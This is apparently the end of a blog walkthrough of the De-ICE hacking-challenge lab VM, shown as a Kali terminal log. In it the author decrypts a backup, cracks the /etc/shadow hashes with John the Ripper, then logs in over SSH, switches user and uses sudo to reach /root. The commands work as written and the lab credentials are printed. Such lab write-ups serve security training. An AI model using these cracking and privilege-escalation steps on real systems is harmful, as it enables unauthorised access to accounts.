rm -fr ${TMPBACKUP}
root@kali:~# openssl enc -d -aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: gzip compressed data, was "backup_webhost_130111.tar", from Unix, last modified: Fri Jan 11 23:42:00 2013, max compression
root@kali:~# tar tvzf backup_webhost_130111.tar.gz
drwxr-xr-x root/root 0 2013-05-13 22:57 etc/
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/ssh/
-rw-r--r-- root/root 125749 2013-01-11 23:42 etc/ssh/moduli
-rw-r--r-- root/root 302 2013-01-11 23:42 etc/ssh/ssh_import_id
-rw-r--r-- root/root 1669 2013-01-11 23:42 etc/ssh/ssh_config
-rw-r--r-- root/root 3924 2013-01-11 23:42 etc/ssh/sshd_config
-rw------- root/root 1374 2013-01-11 23:42 etc/shadow-
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/security/
-rwxr-xr-x root/root 1020 2013-01-11 23:42 etc/security/namespace.init
-rw-r--r-- root/root 1442 2013-01-11 23:42 etc/security/namespace.conf
-rw------- root/root 0 2013-01-11 23:42 etc/security/opasswd
-rw-r--r-- root/root 3635 2013-01-11 23:42 etc/security/group.conf
-rw-r--r-- root/root 4620 2013-01-11 23:42 etc/security/access.conf
-rw-r--r-- root/root 419 2013-01-11 23:42 etc/security/sepermit.conf
-rw-r--r-- root/root 2151 2013-01-11 23:42 etc/security/limits.conf
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/security/namespace.d/
-rw-r--r-- root/root 2980 2013-01-11 23:42 etc/security/pam_env.conf
-rw-r--r-- root/root 2180 2013-01-11 23:42 etc/security/time.conf
-rw-r--r-- root/root 1795 2013-01-11 23:42 etc/security/capability.conf
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/security/limits.d/
-rw-r--r-- root/root 728 2013-01-11 23:42 etc/group
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/skel/
-rw-r--r-- root/root 675 2012-04-03 17:58 etc/skel/.profile
-rw-r--r-- root/root 220 2012-04-03 17:58 etc/skel/.bash_logout
-rw-r--r-- root/root 3486 2012-04-03 17:58 etc/skel/.bashrc
-rw------- root/root 881 2013-01-11 23:42 etc/group-
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/sudoers.d/
-r--r----- root/root 753 2013-01-11 23:42 etc/sudoers.d/README
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/grub.d/
-rwxr-xr-x root/root 6743 2013-01-11 23:42 etc/grub.d/00_header
-rwxr-xr-x root/root 214 2013-01-11 23:42 etc/grub.d/40_custom
-rwxr-xr-x root/root 5522 2013-01-11 23:42 etc/grub.d/05_debian_theme
-rwxr-xr-x root/root 7780 2013-01-11 23:42 etc/grub.d/10_linux
-rwxr-xr-x root/root 6335 2013-01-11 23:42 etc/grub.d/20_linux_xen
-rwxr-xr-x root/root 95 2013-01-11 23:42 etc/grub.d/41_custom
-rwxr-xr-x root/root 1588 2013-01-11 23:42 etc/grub.d/20_memtest86+
-rwxr-xr-x root/root 7603 2013-01-11 23:42 etc/grub.d/30_os-prober
-rw-r--r-- root/root 483 2013-01-11 23:42 etc/grub.d/README
-rwxr-xr-x root/root 1388 2013-01-11 23:42 etc/grub.d/30_uefi-firmware
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/sgml/
-rw-r--r-- root/root 366 2013-01-11 23:42 etc/sgml/catalog
-rw-r--r-- root/root 391 2013-01-11 23:42 etc/sgml/xml-core.cat
-rw-r--r-- root/root 335 2013-01-11 23:42 etc/sgml/catalog.old
-rw-r--r-- root/root 743 2013-01-11 23:42 etc/fstab
-rw-r--r-- root/root 2845 2013-01-11 23:42 etc/sysctl.conf
-rw-r--r-- root/root 65 2013-01-11 23:42 etc/hosts
-rw-r--r-- root/root 3343 2013-01-11 23:42 etc/gai.conf
-rw-rw---- root/sasl 12288 2013-01-11 23:42 etc/sasldb2
-r--r----- root/root 724 2013-01-11 23:42 etc/sudoers
-rw-r--r-- root/root 19 2013-01-11 23:42 etc/su-to-rootrc
-rw-r--r-- root/root 3902 2013-01-11 23:42 etc/securetty
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/groff/
-rw-r--r-- root/root 848 2013-01-11 23:42 etc/groff/mdoc.local
-rw-r--r-- root/root 854 2013-01-11 23:42 etc/groff/man.local
-rw-r--r-- root/root 19281 2013-01-11 23:42 etc/services
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/systemd/
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/systemd/system/
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/systemd/system/multi-user.target.wants/
lrwxrwxrwx root/root 0 2012-12-06 23:55 etc/systemd/system/multi-user.target.wants/rsyslog.service -> /lib/systemd/system/rsyslog.service
-rw-r----- root/shadow 1056 2013-01-11 23:42 etc/shadow
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/sysctl.d/
-rw-r--r-- root/root 1292 2013-01-11 23:42 etc/sysctl.d/10-ptrace.conf
-rw-r--r-- root/root 726 2013-01-11 23:42 etc/sysctl.d/10-kernel-hardening.conf
-rw-r--r-- root/root 519 2013-01-11 23:42 etc/sysctl.d/README
-rw-r--r-- root/root 490 2013-01-11 23:42 etc/sysctl.d/10-ipv6-privacy.conf
-rw-r--r-- root/root 509 2013-01-11 23:42 etc/sysctl.d/10-network-security.conf
-rw-r--r-- root/root 77 2013-01-11 23:42 etc/sysctl.d/10-console-messages.conf
-rw-r--r-- root/root 506 2013-01-11 23:42 etc/sysctl.d/10-zeropage.conf
-rw-r--r-- root/root 87 2013-01-11 23:42 etc/shells
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/gconf/
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/
-rw-r--r-- root/root 0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/%gconf-tree.xml
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/gconf/2/
-rw-r--r-- root/root 3397 2013-01-11 23:42 etc/gconf/2/evoldap.conf
-rw-r--r-- root/root 1421 2013-01-11 23:42 etc/gconf/2/path
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/
-rw-r--r-- root/root 0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/%gconf-tree.xml
-rw-r--r-- root/root 1194 2013-01-11 23:42 etc/passwd
root@kali:~# mkdir webhost
root@kali:~# mv backup_webhost_130111.tar.gz webhost/
root@kali:~# cd webhost
root@kali:~/webhost# tar xvzf backup_webhost_130111.tar.gz
root@kali:~/webhost# john etc/shadow-
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt [32/32])
rhedley (rhedley)
mbrown (mbrown)
mparker (mparker)
swillard (swillard)
guesses: 4 time: 0:00:00:00 DONE (Wed Jan 8 11:12:15 2014) c/s: 50.00 trying: swillard
root@kali:~/webhost# cat etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:sraines
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
fuse:x:104:
messagebus:x:105:
whoopsie:x:106:
mlocate:x:107:
ssh:x:108:
landscape:x:109:
netdev:x:110:
lpadmin:x:111:
sambashare:x:112:
ssl-cert:x:114:
postdrop:x:117:
memcache:x:118:
sraines:x:1000:
mbrown:x:1001:
rhedley:x:1002:
root@kali:~/webhost# john etc/shadow --wordlist=/usr/share/wordlists/darkc0de.lst
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 3 password hashes with 3 different salts (sha512crypt [32/32])
Remaining 1 password hash
brillantissimo (sraines)
guesses: 1 time: 0:00:36:46 DONE (Wed Jan 8 12:22:24 2014) c/s: 268 trying: brillantissimo
Use the "--show" option to display all of the cracked passwords reliably
root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$ su sraines
Unknown id: sraines
mbrown@webhost:~$ su swillard
Password:
swillard@webhost:/home/mbrown$ sudo -l
[sudo] password for swillard:
Matching Defaults entries for swillard on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User swillard may run the following commands on this host:
(ALL : ALL) ALL
swillard@webhost:/home/mbrown$ ls /root
ls: cannot open directory /root: Permission denied
swillard@webhost:/home/mbrown$ sudo ls /root
cleanlogs.sh secret.jpg
swillard@webhost:/home/mbrown$
That's all.
Some hint from here: http://blog.techorganic.com/2013/12/de-ice-hacking-challenge-part-6.html
Nincsenek megjegyzések:
Megjegyzés küldése
Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.